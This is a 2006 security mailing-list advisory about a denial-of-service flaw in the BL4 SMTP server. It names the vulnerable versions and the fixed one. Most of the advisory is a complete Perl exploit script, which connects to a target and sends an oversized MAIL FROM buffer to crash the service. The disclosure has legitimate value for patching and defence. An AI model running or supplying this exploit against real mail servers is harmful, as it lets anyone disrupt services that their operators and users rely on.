[UNIX] BL4 SMTP Server DoS (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 1 May 2006 13:11:30 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
BL4 SMTP Server DoS (Exploit)
------------------------------------------------------------------------
SUMMARY
<http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0> BL4's SMTP server is an
inbound and outbound SMTP server.
A vulnerability in BL4's SMTP server causes a DoS attack.
DETAILS
Vulnerable Systems:
* BL4 SMTP server versions prior to 0.1.5.
Immune Systems:
* BL4 SMTP server version 0.1.5.
Exploit:
#!/usr/bin/perl
use IO::Socket;
use Socket;
my($socket) = "";
if($#ARGV < 1 | $#ARGV > 2) {usage()}
if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" };
$adr = $ARGV[0];
$prt = $ARGV[1];
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";
print " -- Connecting To SMTP server at $adr port $prt ... \n";
sleep(1);
print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request
to $adr .....\n" or die "Error : can't send Request\n";
sleep(1);
print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print "
-- Sending Buffer to $adr .....\n";
sleep(1);
printf("[+]Ok!\n");
printf("[+]Crash service.....\n");
printf("[~]Done.\n");
close($socket);
sub usage()
{
print "\n=========================================\r\n";
print " BL4's SMTP server Remote DOS \r\n";
print "=========================================\r\n";
print " Bug Found by Dedi Dwianto \r\n";
print " www.echo.or.id #e-c-h-o irc.dal.net \r\n";
print " Echo Security Research Group \r\n";
print "=========================================\r\n";
print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";
exit();
}
ADDITIONAL INFORMATION
The original article can be found at:
<http://www.milw0rm.com/exploits/1721>
http://www.milw0rm.com/exploits/1721
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NEWS] Cisco VPN 3000 DoS
- Next by Date: [NEWS] Apple Mac OS X Safari 2.0.3 DoS (Large ROWSPAN)
- Previous by thread: [NEWS] Cisco VPN 3000 DoS
- Next by thread: [NEWS] Apple Mac OS X Safari 2.0.3 DoS (Large ROWSPAN)
- Index(es):
Relevant Pages
|
